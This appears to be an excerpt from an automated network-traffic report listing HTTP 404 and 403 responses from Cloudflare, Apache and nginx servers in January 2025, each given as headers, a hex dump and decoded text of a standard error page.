              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:34 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J9omE8MKObYe0UkPT6VTD%2FnAekwE6cI6KRXFcae1zDIlIuGFT1xyLyp%2FLzVWfp8AqGU%2BAw3jLfHzaPIybSK77YNaAK7SsQhZOuGy91nXB%2BZ0T%2BYlxNUdFe8rSoLNqI0lN3PW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb625ce6c34b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFktooRRtvOcfQxB8uMLEh8VT76xYSTAp0QHLyCuWOwB4GyirGnqQ%2BnsU53Ecbi286VCE9sAcmTkSHB6pqL%2F0%2FBF%2B8hmbYV4eabsaix5zCfY1IADLu6aIrPjdwosMRv1bY7E"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb727efec333-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:43 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:46 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:48 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:51 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:57 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:59 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:13:02 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:13:04 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 22:12:35 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 22:12:38 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 22:12:41 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 